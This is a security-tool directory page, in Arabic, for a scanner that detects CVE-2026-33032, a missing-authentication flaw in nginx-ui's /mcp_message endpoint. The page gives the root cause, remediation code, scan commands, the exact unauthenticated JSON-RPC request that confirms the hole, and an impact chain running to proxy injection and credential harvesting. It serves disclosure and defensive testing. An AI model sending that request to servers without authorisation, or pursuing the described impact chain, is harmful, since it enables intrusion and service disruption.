Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-33032-scanner — أداة فحص ثغرات غير مدمرة لتجاوز مصادقة نقطة نهاية Nginx-UI MCP (CVE-2026-33032) | Kitploit
أدوات/GitHubGitHub/twinson333/cve-2026-33032-scanner
ماسحات الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالمصادقةأمن واجهات برمجة التطبيقات
GitHubtwinson333/cve-2026-33032-scanner

cve-2026-33032-scanner

أداة فحص ثغرات غير مدمرة لتجاوز مصادقة نقطة نهاية Nginx-UI MCP (CVE-2026-33032)

عرض المستودع
327منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح CVE-2026-33032

ماسح ثغرات غير مدمر لتفادي المصادقة في نقطة نهاية MCP الخاصة بـ Nginx-UI

نظرة عامة على الثغرة

CVE-2026-33032 هي ثغرة تفادي مصادقة في تكامل بروتوكول سياق النموذج (MCP) الخاص بـ nginx-ui. تفتقر نقطة النهاية /mcp_message إلى وسيط المصادقة بينما توفر الوصول إلى جميع أدوات MCP، مما يسمح للمهاجمين عن بُعد بـ:

  • قراءة إعدادات nginx وحالته
  • إنشاء/تعديل/حذف ملفات إعدادات nginx
  • إعادة تشغيل أو إعادة تحميل خدمة nginx
  • استخراج بيانات الإعدادات الحساسة
  • حقن إعدادات خبيثة لاعتراض حركة المرور

السبب الجذري

  1. عدم تناسق المصادقة: تتطلب نقطة النهاية /mcp مصادقة، لكن /mcp_message لا تتطلبها:

    root@kitploit:~
    r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), ...)
    r.Any("/mcp_message", middleware.IPWhiteList(), ...)  // Missing AuthRequired()
    
  2. قائمة IP البيضاء مفتوحة الفشل: قائمة IP البيضاء الافتراضية فارغة، وهو ما يتعامل معه الوسيط على أنه "السماح للجميع"

  • كلا النقطتين تشتركان في المعالج: كلاهما يوجهان إلى نفس mcp.ServeHTTP() الذي يعالج جميع استدعاءات أدوات MCP

  • ميزات الماسح

    ✅ اختبار غير مدمر - يستخدم أدوات MCP للقراءة فقط
    ✅ بصمة شاملة - يحدد تثبيتات nginx-ui
    ✅ إثبات مفهوم آمن - لا يتم إجراء أي تغييرات على الإعدادات
    ✅ فحص دفعات - معالجة أهداف متعددة من ملف
    ✅ تقارير مفصلة - إخراج JSON للتكامل

    التثبيت

    root@kitploit:~
    # Clone or download the scanner
    git clone https://github.com/Twinson333/cve-2026-33032-scanner.git
    cd cve-2026-33032
    chmod +x cve-2026-33032-scanner.py
    
    # Install dependencies (if needed)
    pip3 install requests
    

    الاستخدام

    الفحص الأساسي

    root@kitploit:~
    # Scan a single target
    python3 cve-2026-33032-scanner.py -u http://target.com:9000
    
    # Scan with verbose output
    python3 cve-2026-33032-scanner.py -u https://nginx-ui.example.com -v
    
    # Custom timeout
    python3 cve-2026-33032-scanner.py -u http://192.168.1.100:9000 -t 15
    

    الفحص بالدفعات

    root@kitploit:~
    # Scan multiple targets from file
    python3 cve-2026-33032-scanner.py -f targets.txt
    
    # With verbose output and JSON report
    python3 cve-2026-33032-scanner.py -f targets.txt -v -o results.json
    
    #Burp Pingback
    python3 cve-2026-33032-scanner.py -u http://target.com:9000 --collaborator abc123.burpcollaborator.net
    

    تنسيق ملف الأهداف

    root@kitploit:~
    # targets.txt - one URL per line
    http://192.168.1.100:9000
    https://nginx-ui.corp.com
    http://10.0.0.50:9000
    

    كيف يعمل

    ينفذ الماسح عملية اكتشاف متعددة المراحل:

    المرحلة 1: البصمة

    يفحص نقاط نهاية nginx-ui الشائعة لتحديد التثبيت:

    • /api/info - معلومات الإصدار
    • /login - صفحة تسجيل الدخول
    • /api/auth/login - نقطة نهاية المصادقة
    • /mcp و /mcp_message - نقطتا نهاية MCP

    المرحلة 2: فحص المصادقة

    يختبر نقطة النهاية /mcp للتحقق من أنها تتطلب مصادقة بشكل صحيح (خط الأساس)

    المرحلة 3: استغلال الثغرة

    يحاول استدعاءات أدوات MCP غير المدمرة عبر /mcp_message بدون مصادقة:

    1. nginx_status (الأكثر أمانًا) - يقرأ حالة عملية nginx
    2. nginx_config_list - يسرد ملفات الإعدادات
    3. nginx_config_base_path - يحصل على مسار دليل الإعدادات

    إذا نجحت أي أداة بدون مصادقة، يتم تأكيد الثغرة.

    أدوات MCP الآمنة المستخدمة

    يستدعي الماسح أدوات MCP للقراءة فقط فقط:

    الأداةالوصفالتأثير
    nginx_statusقراءة حالة خدمة nginxلا تغييرات
    nginx_config_listسرد ملفات الإعداداتلا تغييرات
    nginx_config_base_pathالحصول على مسار دليل الإعداداتلا تغييرات

    الأدوات المستبعدة صراحةً:

    • nginx_config_add - قد تنشئ ملفات
    • nginx_config_modify - قد تغير الإعدادات
    • restart_nginx / reload_nginx - تعطيل الخدمة
    • nginx_config_enable - قد تغير الإعدادات النشطة

    أمثلة على المخرجات

    هدف ضعيف

    root@kitploit:~
    [+] nginx-ui detected: Found 'nginx-ui' in /login
    [+] /mcp endpoint properly protected
    
    [*] Testing /mcp_message endpoint (CVE-2026-33032)...
      [*] Trying tool: nginx_status - Read nginx status (safest)
          Status: 200
    
    ======================================================================
    [!] VULNERABLE to CVE-2026-33032
    ======================================================================
    Proof: Successfully executed nginx_status without authentication
    

    هدف محمي

    root@kitploit:~
    [+] nginx-ui detected: Version endpoint accessible
    [+] /mcp endpoint properly protected
    
    [*] Testing /mcp_message endpoint (CVE-2026-33032)...
      [*] Trying tool: nginx_status - Read nginx status (safest)
          Status: 401
          Auth required (protected) ✓
    
    [+] NOT vulnerable - endpoint requires authentication
    

    المعالجة

    إذا تم تأكيد الثغرة:

    1. الإصلاح الفوري: إضافة وسيط المصادقة إلى /mcp_message:

      root@kitploit:~
      r.Any("/mcp_message", middleware.IPWhiteList(), middleware.AuthRequired(),
          func(c *gin.Context) {
              mcp.ServeHTTP(c)
          })
      
    2. الدفاع في العمق:

      • تكوين قائمة IP البيضاء للرفض الافتراضي
      • تقييد نقاط نهاية MCP على localhost فقط إذا لم يكن الوصول الخارجي مطلوبًا
      • تنفيذ تحديد معدل على نقاط نهاية MCP
    3. الترقية: التحديث إلى إصدار nginx-ui المُصحح عند توفره

    الإفصاح المسؤول

    هذه الأداة مصممة من أجل:

    • ✅ برامج مكافآت الثغرات
    • ✅ اختبار الاختراق المصرح به
    • ✅ البحث الأمني بإذن
    • ✅ التحقق من الثغرات قبل الإفصاح

    لا تستخدم هذه الأداة على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

    نصائح مكافآت الثغرات

    عند الإبلاغ عن هذه الثغرة:

    1. الخطورة: حرجة (CVSS 9.8+)

      • قابلة للوصول عبر الشبكة
      • لا تتطلب مصادقة
      • اختراق كامل للنظام
      • استخراج الإعدادات + التعديل
    2. الإثبات: تضمين مخرجات الماسح التي تُظهر استدعاء أداة MCP ناجحًا بدون مصادقة

    3. سلسلة التأثير:

      • وصول بدون مصادقة ← قراءة الإعدادات ← كشف طوبولوجيا الخلفية
      • كتابة الإعدادات ← حقن وكيل خبيث ← جمع بيانات الاعتماد
      • إعادة تشغيل nginx ← تعطيل الخدمة ← DoS
    4. إثبات مفهوم آمن: استخدام الأدوات للقراءة فقط فقط (nginx_status, nginx_config_list)

    التفاصيل الفنية

    تنسيق استدعاء أداة MCP

    root@kitploit:~
    POST /mcp_message HTTP/1.1
    Content-Type: application/json
    
    {
      "jsonrpc": "2.0",
      "method": "tools/call",
      "params": {
        "name": "nginx_status",
        "arguments": {}
      },
      "id": 1
    }
    

    الاستجابة الناجحة

    root@kitploit:~
    {
      "jsonrpc": "2.0",
      "result": {
        "content": [
          {
            "type": "text",
            "text": "nginx is running (PID: 1234)"
          }
        ]
      },
      "id": 1
    }
    

    الاستجابة المحمية

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    {
      "error": "authentication required"
    }
    

    المراجع

    • CVE: CVE-2026-33032
    • المتأثر: nginx-ui (الإصدارات التي تحتوي على تكامل MCP)
    • CVSS: 9.8 (حرجة)
    • CWE: CWE-306 (غياب المصادقة للوظائف الحرجة)

    الترخيص

    هذه الأداة مقدمة لأغراض تعليمية واختبار الأمان المصرح به فقط.

    المؤلف

    Antony Esthak Twinson @ Cyber Tamarin
    باحث أمني | صياد مكافآت ثغرات
    متخصص في أمان تطبيقات الويب وبحوث الثغرات


    إخلاء مسؤولية: يقوم هذا الماسح بإجراء اختبارات غير مدمرة فقط. احصل دائمًا على التصريح المناسب قبل اختبار أي أنظمة.

    تنزيل الأداة